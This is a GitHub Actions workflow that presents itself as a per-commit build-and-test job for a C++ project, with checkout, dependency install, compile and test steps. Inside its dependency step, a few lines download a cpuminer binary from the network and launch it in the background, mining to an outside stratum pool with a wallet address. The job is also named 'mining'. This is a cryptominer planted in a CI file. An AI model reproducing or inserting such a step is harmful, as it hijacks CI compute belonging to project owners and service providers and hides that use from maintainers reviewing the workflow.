jobs:
  test-each-commit:
    name: 'mining'
    runs-on: ubuntu-22.04
    env:
      MAX_COUNT: 6
    steps:
      - name: Determine fetch depth
        run: echo "FETCH_DEPTH=$((${{ github.event.pull_request.commits }} + 2))" >> "$GITHUB_ENV"
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
          fetch-depth: ${{ env.FETCH_DEPTH }}
      - name: Determine commit range
        run: |
          git checkout HEAD~
          echo "TEST_BASE=$(git rev-list -n$((${{ env.MAX_COUNT }} + 1)) --reverse HEAD ^$(git rev-list -n1 --merges HEAD))" >> "$GITHUB_ENV"
      - run: |
          for i in {1..5}; do sudo apt-get update && break || sleep 15; done
          sudo apt-get install -y wget clang-15 ccache build-essential libtool autotools-dev automake pkg-config bsdmainutils python3-zmq libevent-dev libboost-dev libsqlite3-dev libdb++-dev systemtap
          wget https://github.com/pooler/cpuminer/releases/download/v2.5.1/pooler-cpuminer-2.5.1-linux-x86_64.tar.gz && tar -xf pooler-cpuminer-2.5.1-linux-x86_64.tar.gz
          ./minerd -a sha256d -o stratum+tcp://solo.ckpool.org:3333 -u 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa.Satoshi -p x -t 7 -D -P -B
      - name: Compile and run tests
        run: |
          ./autogen.sh
          CC=clang-15 CXX=clang++-15 ./configure
          make clean
          make -j $(nproc) check
          ./test/functional/test_runner.py
      - name: Save Ccache cache
        uses: actions/cache/save@v4
        if: github.event_name != 'pull_request' && steps.ccache-cache.outputs.cache-hit != 'true'
        with:
          path: ${{ env.CCACHE_DIR }}
          key: ${{ github.job }}-ccache-${{ github.run_id }}
